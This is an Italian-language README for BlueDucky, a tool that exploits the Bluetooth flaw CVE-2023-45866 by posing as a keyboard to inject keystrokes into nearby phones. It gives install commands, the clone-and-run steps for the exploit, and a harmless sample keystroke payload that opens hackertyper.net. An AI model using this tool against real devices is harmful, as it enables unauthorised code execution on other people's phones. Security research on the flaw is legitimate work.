
BlueDucky sfrutta una vulnerabilità Bluetooth, in particolare la CVE-2023-45866, che consente a un attaccante di iniettare sequenze di tasti in un dispositivo target. Il dispositivo dell'attaccante si spaccia per una tastiera Bluetooth per stabilire una connessione crittografata senza l'autorizzazione dell'utente. Lo strumento BlueDucky automatizza questo processo.
Grazie a tutte le persone di HackNexus. Assicurati di unirti a noi su VC! https://discord.gg/HackNexus
NOTE: Non potrò eseguire questo su un laptop o altro dispositivo diverso da un Raspberry Pi per i test. Per questo motivo, eventuali problemi che riscontrerete dovranno essere risolti tra di voi, poiché non ho fondi extra per acquistare un adattatore.
🚨 CVE-2023-45866 - Implementazione BlueDucky (usando DuckyScript)
🔓 Associazione non autenticata che porta all'esecuzione di codice (usando tastiera HID)
Questa è un'implementazione della CVE scoperta da marcnewlin
BlueDucky è un potente strumento per sfruttare una vulnerabilità nei dispositivi Bluetooth. Eseguendo questo script, puoi:
Ho eseguito con successo questo su un Raspberry Pi 4 usando il modulo Bluetooth predefinito. Funziona su vari telefoni, con un'interessante eccezione per un marchio neozelandese, Vodafone.
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
# update pacman & packages
sudo pacman -Syyu
# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
python-setuptools python-pydbus python-dbus
git gcc python-pip \
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py
in alternativa,
pip3 install -r requirements.txt
🚧 Lavori in corso:
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300